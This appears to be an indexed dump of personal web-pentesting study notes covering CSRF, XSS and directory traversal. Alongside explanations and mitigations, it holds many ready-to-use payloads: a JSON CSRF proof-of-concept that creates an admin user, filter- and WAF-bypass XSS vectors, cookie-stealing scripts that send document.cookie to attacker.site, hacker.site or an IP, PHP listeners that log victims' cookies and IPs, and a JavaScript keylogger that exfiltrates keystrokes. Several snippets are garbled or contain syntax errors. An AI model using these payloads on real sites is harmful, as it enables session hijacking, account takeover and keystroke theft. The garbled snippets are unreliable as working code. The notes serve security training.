                    CSRF vulnerabilities may arise when applications rely solely on HTTP cookies to identify the user that has issued a particular request. Because browsers automatically add cookies to requests regardless of the request's origin, it may be possible for an attacker to create a malicious web site that forges a cross-domain request to the vulnerable application.

                    Three conditions that enable CSRF:

                    • A relevant action.
                    • Cookie-based session handling.
                    • No unpredictable request parameters.
                    ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#how-it-works","title":"How it works","text":"
                    The attacker crafts a malicious request (e.g., changing the user's email address or password) and embeds it in a web page, email, or some other form of content.\n\nThe attacker lures the victim into loading this content while the victim is authenticated in the target web application.\n\nThe victim's browser automatically sends the malicious request, including the victim's authentication cookie.\n\nThe web application, trusting the request due to the authentication cookie, processes it, causing the victim's account to be compromised or modified.\n

                    CSRF attacks can have serious consequences:

                    • Unauthorized changes to a user's account settings.
                    • Fund transfers or actions on behalf of the user without their consent.
                    • Malicious actions like changing passwords, email addresses, or profile information.
                    ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#how-to-test-csrf-by-using-burpsuite-proof-of-concept","title":"How to test CSRF by using Burpsuite proof of concept","text":"

                    Burp has a quite awesome PoC so you can generate HTML (and javascript) code to replicate this attack.

                    1. Select a URL or HTTP request anywhere within Burp, and choose Generate CSRF PoC within Engagement tools in the context menu.

                    2. You have two buttons: one for editing the request manually (Regenerate button) the HTML based on the updated request; and tje ptjer to test the effectiveness of the generated PoC in Burp's browser (Test in browser button).

                    3. Open the crafted page from the same browser where the user has been logged in.

                    4. Observe the result, i.e. check if the web server executed the request.

                    ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#fetch-api","title":"Fetch API","text":"

                    Requirements:

                    1. Authentication Method should be cookie based only
                    2. No Authentication Token in Header
                    3. Same-Origin Policy should not be enforced

                    Browser -> Network tab in development tools, right click on request and copy as fetch:

                    ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#json-csrf","title":"Json CSRF","text":"

                    Resources: https://systemweakness.com/ways-to-exploit-json-csrf-simple-explanation-5e77c403ede6

                    POC: source rootsploit.com

                    # Change the URL and Body from the PoC file to perform the CSRF on JSON Endpoint.\n<html>\n<title>CSRF Exploit POC by RootSploit</title>\n\n<body>\n    <center>\n        <h1> CSRF Exploit POC by RootSploit</h1>\n\n        <script>\n            function JSON_CSRF() {\n                fetch('https://vuln.rootsploit.io/v1/addusers', { method: 'POST', credentials: 'include', headers: { 'Content-Type': 'application/json' }, body: '{\"user\":{\"role_id\":\"full_access\",\"first_name\":\"RootSploit\",\"last_name\":\"RootSploit\",\"email\":\"csrf-test@rootsploit.com\",\"password\":\"Password@\",\"confirm_password\":\"Password@\",\"mobile_number\":\"99999999999\"}}' });\n                window.location.href=\"https://rootsploit.com/csrf\"\n            }\n        </script>\n\n        <button onclick=\"JSON_CSRF()\">Exploit CSRF</button>\n    </center>\n</body>\n\n</html>\n
                    ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#mitigation","title":"Mitigation","text":"

                    Cross-Site Request Forgery Prevention Cheat Sheet

                    ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#related-labs","title":"Related labs","text":"
                    • https://portswigger.net/web-security/all-labs#cross-site-request-forgery-csrf
                    ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#resources","title":"Resources","text":"

                    When it comes to web vulnerabilities, it is useful to have some links at hand:

                    • Owasp vuln description: https://owasp.org/www-community/attacks/csrf.
                    • Using Burp to Test for Cross-Site Request Forgery (CSRF): https://portswigger.net/support/using-burp-to-test-for-cross-site-request-forgery.
                    • PoC with Burp, official link: https://portswigger.net/burp/documentation/desktop/functions/generate-csrf-poc.
                    ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#tools-and-payloads","title":"Tools and payloads","text":"
                    • See updated chart: Attacks and tools for web pentesting.
                    ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-scripting-xss/","title":"XSS attack - Cross-Site Scripting","text":"OWASP reference

                    OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.2. Testing for Stored Cross Site Scripting

                    ID Link to Hackinglife Link to OWASP Description 7.1 WSTG-INPV-01 Testing for Reflected Cross Site Scripting - Identify variables that are reflected in responses. - Assess the input they accept and the encoding that gets applied on return (if any). 7.2 WSTG-INPV-02 Testing for Stored Cross Site Scripting - Identify stored input that is reflected on the client-side. - Assess the input they accept and the encoding that gets applied on return (if any). 11.1 WSTG-CLNT-01 Testing for DOM-Based Cross Site Scripting - Identify DOM sinks. - Build payloads that pertain to every sink type. Sources for these notes
                    • My Ine: eWPTv2.
                    • Hacktricks.
                    • XSS Filter Evasion Cheat Sheet\u00b6.
                    • OWASP: WSTG.
                    • Notes during the Cibersecurity Bootcamp at The Bridge.
                    • Experience pentesting applications.

                    Cross-Site scripting (XSS) is a client-side web vulnerability that allows attackers to inject malicious scripts into web pages. This vulnerability is typically caused by a lack of input sanitization/validation in web applications. Attackers leverage XSS vulnerabilities to inject malicious code into web applications. Because XSS is a client side vulnerability, these scripts are executed by the victims browser. XSS vulnerabilities affect web applications that lack input validation and leverage client-side scripting languages like Javascript, Flash, CSS etc.

                    # Quick steps to test XSS \n# 1. Find a reflection point (inspect source code and expand all tags to make sure that it's really a reflection point and it's not parsing your input)\n# 2. Test with <i> tag\n# 3. Test with HTML/JavaScript code (alert('XSS'))\n

                    But, of course, you may use an extensive repository of payloads. This OWASP cheat sheet is kind of a bible.

                    XSS attacks are typically exploited for the following objectives:

                    1. Cookie stealing/Session hijacking - Stealing cookies from users with authenticated sessions, allowing you to login as other users by leveraging the authentication information contained within a cookie.
                    2. Browser exploitation - Exploitation of browser vulnerabilities.
                    3. Keylogging - Logging keyboard entries made by other users on a web application.
                    4. Phishing - Injecting fake login forms into a webpage to capture credentials.
                    5. ... and many more.
                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#types-of-cross-site-scripting-xss","title":"Types of Cross-Site Scripting XSS","text":"

                    1. Reflected attacks: malicious payload is carried inside the request that the browser sends. You need to bypass the anti-xss filters. This way when the victim clicks on it it will be sending their information to the attacker (limited to js events).

                    Example:

                    http://victim.site/seach.php?find=<payload>\n

                    2. Persistent or stored XSS attacks: payload is sent to the web server and then stored. The most common vector for these attacks are HTML forms that submit content to the web server and then display that content back to the users (comments, user profiles, forum posts\u2026). Basically if the url somehow stays in the server, then, every time that someone accesses to it, they will suffer the attack.

                    3. DOM based XSS attacks: tricky one. This time the javascript file procedes from the server, and in that sense, the file is trusteable. Nevertheless, the file modifies changes in the web structure. Quoting OWASP: \"DOM Based XSS (or as it is called in some texts, \u201ctype-0 XSS\u201d) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM \u201cenvironment\u201d in the victim\u2019s browser used by the original client side script, so that the client side code runs in an unexpected manner\".

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#1-reflected-cross-site-scripting","title":"1. Reflected Cross Site Scripting","text":"

                    OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.1. Testing for Reflected Cross Site Scripting

                    ID Link to Hackinglife Link to OWASP Description 7.1 WSTG-INPV-01 Testing for Reflected Cross Site Scripting - Identify variables that are reflected in responses. - Assess the input they accept and the encoding that gets applied on return (if any).

                    Reflected\u00a0Cross-site Scripting (XSS) occur when an attacker injects browser executable code within a single HTTP response. The injected attack is not stored within the application itself; it is non-persistent and only impacts users who open a maliciously crafted link or third-party web page. When a web application is vulnerable to this type of attack, it will pass unvalidated input sent through requests back to the client.

                    XSS Filter Evasion Cheat Sheet

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#causes","title":"Causes","text":"

                    This vulnerable PHP code in a welcome page may lead to an XSS attack:

                    <?php $name = @$_GET['name']; ?>\n\nWelcome <?=$name?>\n
                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#2-persistent-or-stored-cross-site-scripting","title":"2. Persistent or stored Cross Site Scripting","text":"OWASP reference

                    OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.2. Testing for Stored Cross Site Scripting

                    ID Link to Hackinglife Link to OWASP Description 7.2 WSTG-INPV-02 Testing for Stored Cross Site Scripting - Identify stored input that is reflected on the client-side. - Assess the input they accept and the encoding that gets applied on return (if any).

                    Stored cross-site scripting is a vulnerability where an attacker is able to inject Javascript code into a web application\u2019s database or source code via an input that is not sanitized. For example, if an attacker is able to inject a malicious XSS payload in to a webpage on a website without proper sanitization, the XSS payload injected in to the webpage will be executed by the browser of anyone that visits that webpage.

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#causes_1","title":"Causes","text":"

                    This vulnerable PHP code in a welcome page may lead to a stored XSS attack:

                    <?php \n$file  = 'newcomers.log';\nif(@$_GET['name']){\n    $current = file_get_contents($file);\n    $current .= $_GET['name'].\"\\n\";\n    //store the newcomer\n    file_put_contents($file, $current);\n}\n//If admin show newcomers\nif(@$_GET['admin']==1)\n    echo file_get_contents($file);\n?>\n\nWelcome <?=$name?>\n
                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#3-dom-cross-site-scripting-type-0-or-local-xss","title":"3. DOM Cross Site Scripting (Type-0 or Local XSS)","text":"OWASP reference

                    OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.2. Testing for Stored Cross Site Scripting

                    ID Link to Hackinglife Link to OWASP Description 11.1 WSTG-CLNT-01 Testing for DOM-Based Cross Site Scripting - Identify DOM sinks. - Build payloads that pertain to every sink type.

                    The key in exploiting this XSS flaw is that the client-side script code can access the browser's DOM, thus all the information available in it. Examples of this information are the URL, history, cookies, local storage,... Technically there are two keywords: sources and sinks. Let's use the following vulnerable code:

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#causes_2","title":"Causes","text":"

                    This vulnerable code in a welcome page may lead to a DOM XSS attack: http://example.com/#w!Giuseppe

                    <h1 id='welcome'></h1>\n<script>\n    var w = \"Welcome\";\n    var name = document.location.hash.search(/#W!1)+3,\n                document.location.hash.length\n                );\n    document.getElementById('Welcome').innerHTML = w + name;\n</script>\n

                    location.hash is the source of the untrusted input. .innerHTML is the sink where the input is used.

                    To deliver a DOM-based XSS attack, you need to place data into a source so that it is propagated to a sink and causes execution of arbitrary JavaScript. The most common source for DOM XSS is the URL, which is typically accessed with the\u00a0window.location\u00a0object.

                    What is a sink? A sink is a potentially dangerous JavaScript function or DOM object that can cause undesirable effects if attacker-controlled data is passed to it. For example, the\u00a0eval()\u00a0function is a sink because it processes the argument that is passed to it as JavaScript. An example of an HTML sink is\u00a0document.body.innerHTML\u00a0because it potentially allows an attacker to inject malicious HTML and execute arbitrary JavaScript.

                    Summing up: you should avoid allowing data from any untrusted source to be dynamically written to the HTML document.

                    Which sinks can lead to DOM-XSS vulnerabilities:

                    • document.write()
                    • document.writeln()
                    • document.replace()
                    • document.domain
                    • element.innerHTML
                    • element.outerHTML
                    • element.insertAdjacentHTML
                    • element.onevent

                    This project, DOMXSS wiki aims to identify sources and sinks methods exposed by public, widely used javascript frameworks.

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#4-universal-xss-uxss","title":"4. Universal XSS (UXSS)","text":"

                    Universal XSS is a particular type of Cross Site Scripting that does not leverage the flaws against web application, but the browser, its extensions or its plugins. A typical example for this could be found within the Google Chrome WordReference Extension, that did not properly sanitized the input of the search.

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#attack-techniques","title":"Attack techniques","text":"","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#quick-steps-to-test-xss","title":"Quick steps to test XSS","text":"

                    1. Detect input vectors. Find a reflection point for a given input entry. This is tricky, since sometimes the entered value is reflected on a different part of the application.

                    2. Check impact. Once identified the reflection point, inspect source code and recursively expand all tags to make sure that it's really a reflection point and it's not parsing your input. This is also tricky, but there are techniques as encoding and double encoding that will allow us to bypass some XSS filters.

                    3. Classify correctly what your injection point is like. Are you injecting raw HTML directly or a HTML tag? Are you injecting a tag attribute value? Are you injecting into the javascript code? Where in the DOM are you operating? Is there a WAF tampering your input? Answering these questions is the same of knowing what characters you are needing to escape.

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#1-bypassing-xss-filters","title":"1. Bypassing XSS filters","text":"

                    Reflected cross-site scripting attacks are prevented as the web application sanitizes input, a web application firewall blocks malicious input, or by mechanisms embedded in modern web browsers.

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#11-injecting-inside-raw-html","title":"1.1. Injecting inside raw HTML","text":"
                    <script>alert(1)</script>\n<img src=x onerror=alert(1) />\n<svg onload=alert('XSS')>\n
                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#12-injecting-into-html-tags","title":"1.2. Injecting into HTML tags","text":"

                    Firstly, some common escaping characters that may be parsed (and you need to further investigate to see how the application is treating them) are:

                    • >\u00a0(greater than)
                    • <\u00a0(less than)
                    • &\u00a0(ampersand)
                    • '\u00a0(apostrophe or single quote)
                    • \"\u00a0(double quote)

                    Additionally, there might exist a filter for the characters script. Being that the case:

                    1. Insert unexpected variations in the syntax such as random capitalization, blank spaces, new lines...:

                    \"><script >alert(document.cookie)</script >\n\"><ScRiPt>alert(document.cookie)</ScRiPt>\n

                    2. Bypass non-recursive filtering:

                    <scr<script>ipt>alert(documInjecting into HTML tagsent.cookie)</script>\n

                    3. Bypass encoding.

                    # Simple encoding\n\"%3cscript%3ealert(document.cookie)%3c/script%3e\n\n# More encoding techniques: \n# 1. We lookk for a charcode calculator and enter our payload, for instance \"lala\" would be: 34, 108, 97, 108, 97, 34\n# 2. Them we put those numbers in our payload\n<script>alert(String.fromCharCode(34, 108, 97, 108, 97, 34))</script>\n

                    Double encoding is very effective. I've run into cases in the wild.

                    4. Unexpected parent tags:

                    <svg><x><script>alert('1'&#41</x>\n

                    5. Unexpected weird attributes, null bytes:

                    <script x>\n<script a=\"1234\">\n<script ~~~>\n<script/random>alert(1)</script>\n<script ///Note the newline\n>alert(1)</script>\n<scr\\x00ipt>alert(1)</scr\\x00ipt>\n

                    More. If the scripttag is super blacklisted in all their forms, use other tags:

                    <img> ... <IMG>\n<iframe>\n<input>\n

                    Or even, make out your own:

                    <lalala> \n
                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#13-injecting-into-html-attributes","title":"1.3. Injecting into HTML attributes","text":"","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#a-id","title":"a) id","text":"

                    For instance, this injection endpoint (INJ):

                    <div id=\"INJ\">\n

                    A payload for grabbing the cookies and have them sent to our attacker server would be:

                    x\" onmouseover=\"new Image().src=\"https://attacker.site/c.php?cc='+escape(document.cookie)\n
                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#b-href","title":"b) href","text":"

                    For instance, this injection endpoint (INJ):

                    <a href=\"victim.site/#INJ\">\n

                    A payload for grabbing the cookies and have them sent to our attacker server would be:

                    x\" onmouseover=\"new Image().src=\"https://attacker.site/c.php?cc='+escape(document.cookie)\n
                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#c-height","title":"c) height","text":"

                    For instance, this injection endpoint (INJ):

                    <video  width=\"320\" height=\"INJ\">\n

                    A payload for grabbing the cookies and have them sent to our attacker server would be:

                    240\" src=x onerror=\"new Audio().src=\"https://attacker.site/c.php?cc='+escape(document.cookie)\n

                    1. One nice technique is using non-common javascript events.

                    # The usual payloads contains these events:\nalert()\nconfirm()\nprompt()\n\n# Try others:\nonload()\nonerror()\nonmousehover\n...\n

                    See complete reference at: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

                    2. Sometimes the events are filtered. This is a very common regex for filtering:

                    (on\\w+\\s*=)\n

                    Bypassing it:

                    <svg/onload=alert(1)>\n<svg//////onload=alert(1)>\n<svg id=x;onload=alert(1)>\n<svg id='x'onload=alert(1)>\n

                    3. Bettering up the filter:

                    (?i)([\\s\\\"'`;\\/0-9\\=]+on\\w+\\s*=)\n

                    Bypassing it:

                    <svg onload%09=alert(1)>\n<svg %09onload=alert(1)>\n<svg %09onload%09=alert(1)>\n<svg onload%09%20%28%2c%3B=alert(1)>\n<svg onload%0B=alert(1)>\n

                    https://shazzer.co.uk/vectors is a great resource to see potential attack vectors.

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#14-going-beyond-the-scripttag","title":"1.4. Going beyond the <script>tag","text":"
                    <a href=\"javascript:alert(1)\">click</a>\n<a href=\"data:text/html;base64,amF2YXNjcmlwdDphbGVyKDEp\">click</a>\n<form action=\"javascript:alert(1)\"><button>send</button></form>\n\n<form id=x></form><button form=\"x\" formaction=\"javascript:alert(1)\">send</button>\n
                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#2-bypassing-the-httponly-flag","title":"2. Bypassing the HTTPOnly flag","text":"

                    The HTTPOnly flag can be enabled with the response header Set-Cookie:

                    Set-Cookie: <cookie-name>=<cookie-value>; HttpOnly\n

                    HTTPOnly forbids javaScript from accessing the cookies, for example, through the\u00a0Document.cookie\u00a0property.

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#21-cross-site-tracing","title":"2.1. Cross Site Tracing","text":"

                    OWASP Cross Site Tracing reference

                    Technique for bypassing HTTPOnly flag. Since scripting languages are blocked due to the use of HTTPOnly, this technique proposes to use the HTTP TRACE method.

                    HTTP TRACE method is a method used for debugging, and it echoes back input requests to the user. So, if we send HTTP headers normally inaccessible to Javascript, we will be able to read them.

                    We will take advantage of the javascript object XMLHttpRequestthat provides a way to retrieve data from an URL without having to do a full page refresh:

                    <script> //TRACE Request\n    var xmlhttp = new XMLHttpRequest()M\n    var url = 'http://victim.site/';\n    xmlhttp.withCredentials = true; // Send cookie header\n    xmlhttp.open('TRACE', url);\n\n    // Callback to log all response headers\n    function hand() { console.log(this.getAllResponseHeaders());}\n    xmlhttp.onreadystatechange = hand;\n\n    xmlhttp.send(); // Send the request\n\n</script>\n

                    Modern browsers block the HTTP TRACE method in XMLHttpRequest and other scripting languages and libraries such as JQuery, Silverlight... But if the attacker finds another way of doing HTTP TRACE requests, then they can bypass the HTTPOnly flag.

                    For instance, Amit Klein found a simple trick for IE 6.0 SP2. Instead of using TRACE for the method, he used \\r\\nTRACEand the payload worked under certain circumstances.

                    CVE-2012-0053: Apache HTTPOnly cookie disclosure. For Apache HTTP Server 2.2.x through 2.2.21. For an HTTP-Header value exceeding the server limits, the server responded with a HTTP 400 Bad Request including the complete headers containing the HTTPOnly cookies. (https://gist.github.com/pilate/1955a1c28324d4724b7b). BeEF has a module named Apache Cookie Disclosure, available under Exploits section.

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#22-beef-tunneling-proxy","title":"2.2. BeEF Tunneling Proxy","text":"

                    An alternative to stealing protected cookies is to use the victim browser as a proxy. The Tunneling Proxy in BeEF exploits the XSS flaw and uses the victim browser to perform requests as the victim user to the web application. Basically, it tunnels requests through the hooked browser. By doing so, there is no way for the web application to distinguish between requests coming from legitimate user and requests forged by an atacker. BeEF allows you to bypass other web developer protection techniques such as using multiple validations (User-agent, custom headers,...)

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#bypassing-wafs","title":"Bypassing WAFs","text":"","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#modsecurity","title":"ModSecurity","text":"
                    <svg onload='new Function`[\u201c_Y000!_\u201d].find(al\\u0065rt)`'>\n
                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#examples-of-typical-attacks","title":"Examples of typical attacks","text":"","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#1-cookie-stealing-examples-and-techniques","title":"1. Cookie stealing: examples and techniques","text":"","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#example-1","title":"Example 1","text":"

                    Identify an injection endpoint and test that the app is vulnerable to a basic xss payload such as:

                    <script>alert(\u2018lala\u2019)</script>\n

                    Once you know is vulnerable, prepare a malicious javascript code for stealing the cookies:

                    <script>\nvar i = new Image();\ni.src = \"http://attacker.site/log.php?q=\"+document.cookie;\n</script>\n

                    Add that code to the injection endpoint that you detected in step 1. That code will save the cookie in a text file on the attacker site.

                    Create a text file (log.php) for capturing the sent cookie in the attacker site:

                        <?php\n        $filename=\u201d/tmp/log.txt\u201d;\n        $fp=fopen($filename, \u2018a\u2019);\n        $cookie=$_GET[\u2018q`];\n        fwrite($fp, $cookie);\n        fclose($fp);\n    ?>\n

                    Open the listener in the attacker site and send the crafted URL with the payload included. Once someone open it, they will be sending to the attacker their cookies jar.

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#example-2","title":"Example 2","text":"
                    1. The attacker creates a get.php file and saves it into its server.

                    2. This php file will store the data that the attacker server receives into a file.

                    3. This could be the content of the get.php file:

                    <?php\n    $ip = $_SERVER(\u2018REMOTE_ADDR\u2019);\n    $browser = $_SERVER(\u2018HTTP_USER_AGENT\u2019);\n\n    $fp = fopen(\u2018jar.txt\u2019, \u2018a\u2019);\n\nfwrite($fp, $ip . \u2018 \u2018 . $browser . \u201c \\n\u201d);\nfwrite($fp, urldecode($_SERVER[\u2018QUERY_STRING\u2019]) . \u201c \\n\\n\u201d);\nfclose($fp);\n?>\n
                    1. Now in the web server the attacker achieve to store this payload:
                    <script>\nvar i = new Image();\ni.src = \u201chttp://attacker.site/get.php?cookie=\u201d+escape(document.cookie);\n</script>\n\n# Or in one line:\n<script>var i = new Image(); i.src = \u201chttp://10.86.74.7/moville.php?cookie=\u201d+escape(document.cookie); </script>\n
                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#techniques-for-cookie-stealing","title":"Techniques for cookie stealing","text":"

                    Let's suppose we have our PHP script C.php listening on our hacker.site domain.

                    Example of C.php Simple Listerner:

                    # Instruct the script to simply store the GET['cc'] content in a file\n<?php\nerror_reporting(0); # Turn off all error reporting\n$cookie= $_GET['cc']; # Request to log\n$file= '_cc_.txt'; # The log file\n$handle= fopen($file,\"a\"); # Open log file in append mode\nfwrite($handle,$cookie.\"\\n\"); # Append the cookie\nfclose($handle); # Append the cookie\n\necho '<h1>Page under construction</h1>'; # Trying to hide suspects.\n

                    Example of C.php Listerner recording hosts, time of logging, IP addresses:

                    # Instruct the script to simply store the GET['cc'] content in a file\n<?php\nerror_reporting(0); # Turn off all error reporting\n\nfunction getVictimIP()= { ... } # Function that returns victim IP\nfunction collect() {\n$file= '_cc_.txt'; # The log file\n$date=date(\"l dS of F Y h:i:s A\");\n$IP=getVictimIP();\n$cookie= $_SERVER['QUERY_STRING'];\n\n$log=\"[$date]\\n\\t> VictimIP: $IP\\n\\t> Cookies: $cookie\\n\\t> Extra info: $info\\n\";\n$handle= fopen($file,\"a\"); # Open log file in append mode\nfwrite($handle,$log.\"\\n\\b\"); # Append the cookie\nfclose($handle); # Append the cookie\n}\ncollect();\necho '<h1>Page under construction</h1>'; # Trying to hide suspects.\n

                    Additionally we can use: netcat, Beef,...

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#2-dom-based-attack-incorrect-use-of-eval","title":"2. DOM based attack: incorrect use of eval()","text":"

                    In the following website we can see the code below:

                    And in the source code we can pinpoint this script:

                    <script>\n    var statement = document.URL.split(\"statement=\")[1];\n    document.getElementById(\"result\").innerHTML = eval(statement);\n</script>\n

                    This JavaScript code is responsible for calculating and dynamically displaying the result of the arithmetic operation via the DOM splits the URL and parses the value of the\u00a0statement\u00a0parameter to the JavaScript\u00a0eval()\u00a0function for evaluation/calculation.

                    The JavaScript\u00a0eval()\u00a0function is typically used by developers to evaluate JavaScript code, however, in this case, it has been improperly implemented to evaluate/perform the arithmetic operation specified by the user.

                    NOTE: The eval()\u00a0function should never be used to execute JavaScript code in the form of a string as it can be leveraged by attackers to perform arbitrary code execution.

                    Given the improper implementation of the\u00a0eval()\u00a0function, we can inject our XSS payload as a value of the\u00a0statement\u00a0parameter and forces the\u00a0eval()\u00a0function to execute the JavaScript payload.

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#3-defacements","title":"3. Defacements","text":"

                    We may categorize defacements into two types: Non-persistent (Virtuals) and Persistent.

                    • Non-persistent defacements don't modify the content hosted on the target web application. They are basically abusing Reflected XSS.
                    # Code\n<?php $name = @$_GET['name']; ?>\nWelcome <?=$name?>\n\n# URL\nhttps://victim.site/XSS/reflected.php?name=%3Cscript%3Edocument.body.innerHTML=%22%3Cimg%20src=%27http://hackersite/pwned.png%27%3E%22%3C/script%3E\n
                    • Persistent defacements modify permanently the content hosted on the target web application. They are basically abusing Stored XSS.

                    Tools for cloning a website

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#4-keyloggers","title":"4. Keyloggers","text":"

                    A tool: http_javascript_keylogger. See also my notes on that metasploit module.

                    Event logger from BeEF.

                    The following code:

                    var keys = \"\" //Where > where to store the key strokes\ndocument.onkeypress = function(e) {\n    var get = windows.event ? event : eM\n    var key = get.keyCode ? get.keyCode : get.charCode;\n    key = String.fromCharCode(key);\n    keys += key;\n}\n\nwindow.setInterval(function()) {\n    if(keys != \"\") {\n        //HOW> sends the key strokes via GET using an Image element to listening hacker.site server\n        var path = encodeURI(\"http://hacker.site/keylogger?k=\" + keys);\n        new Image().src = path;\n        keys = \"\";\n\n    }\n}, 1000; // WHEN > sends the key strokes every second\n

                    Additionally, we have the metasploit module auxiliary(http_javascript_keylogger), an advance version of the previous javascript code. It creates the Javascript payload with a keylogger, which could be injected within the vulnerable web page and automatically starts the listening server. To see how it works, set the DEMO option to true.

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#5-network-attacks","title":"5. Network attacks","text":"

                    A way to enter within intranet networks is by passing through HTTP traffic that, despite other protocols, is usually allowed to pass by firewalls.

                    1. IP detection

                    The first step before putting your feet in a network is to retrieve as much network information as possible about the hooked browser. For instance by revealing its internal IP address and subnet.

                    Traditionally, this required the use of external browser's pluggins such as Java JRE and some interaction from the victim: - Installing My Address Java Applet: Unsigned java applet that retrieves IP. - Changing the java security settings enabling or reducing the security level).

                    Use of https://net.ipcalf.com/ , that abuses WebRTC HTML5 feature.

                    2. Subnet detection

                    3. Ping Sweeping

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#6-bypassing-restrictions-in-frameset-tag","title":"6. Bypassing restrictions in frameset tag","text":"

                    See https://www.doyler.net/security-not-included/frameset-xss.

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#mitigations-for-cookie-stealing","title":"Mitigations for cookie stealing","text":"","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#httponly","title":"HTTPOnly","text":"

                    The HTTPOnly flag can be enabled with the response header Set-Cookie:

                    Set-Cookie: <cookie-name>=<cookie-value>; HttpOnly\n

                    HTTPOnly forbids javaScript from accessing the cookies, for example, through the\u00a0Document.cookie\u00a0property. Note that a cookie that has been created with\u00a0HttpOnly\u00a0directive will still be sent with JavaScript-initiated requests, for example, when calling\u00a0XMLHttpRequest.send()\u00a0or\u00a0fetch(). This mitigates attacks against cross-site scripting XSS.

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#tools-and-payloads","title":"Tools and payloads","text":"
                    • XSSER: An automated web pentesting framework tool to detect and exploit XSS vulnerabilities
                    • Vectors (payload) regularly updated: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet.
                    • Evasion Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html.
                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/directory-traversal/","title":"Directory Traversal attack","text":"OWASP

                    OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.1. Testing Directory Traversal File Include

                    ID Link to Hackinglife Link to OWASP Description 5.1 WSTG-ATHZ-01 Testing Directory Traversal File Include - Identify injection points that pertain to path traversal. - Assess bypassing techniques and identify the extent of path traversal (dot-dot-slash attack, Local/Remote file inclusion) Resources
                    • PayAllTheThings

                    Directory traversal vulnerabilities, also known as path traversal or directory climbing vulnerabilities, are a type of security vulnerability that occurs when a web application allows unauthorized access to files and directories outside the intended or authorized directory structure. Directory traversal vulnerabilities can lead to serious data breaches and system compromises if not addressed/mitigated.

                    Directory traversal vulnerabilities typically arise from improper handling of user input, especially when dealing with file or directory paths. This input could be obtained from URL parameters, user-generated content, or other sources. An attacker takes advantage of lax input validation or insufficient sanitization of user inputs. They manipulate the input by adding special characters or sequences that trick the application into navigating to directories it shouldn't have access to.

                    ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/directory-traversal/#before-testing","title":"Before testing","text":"

                    Each operating system uses different characters as path separator:

                    Unix-like OS:

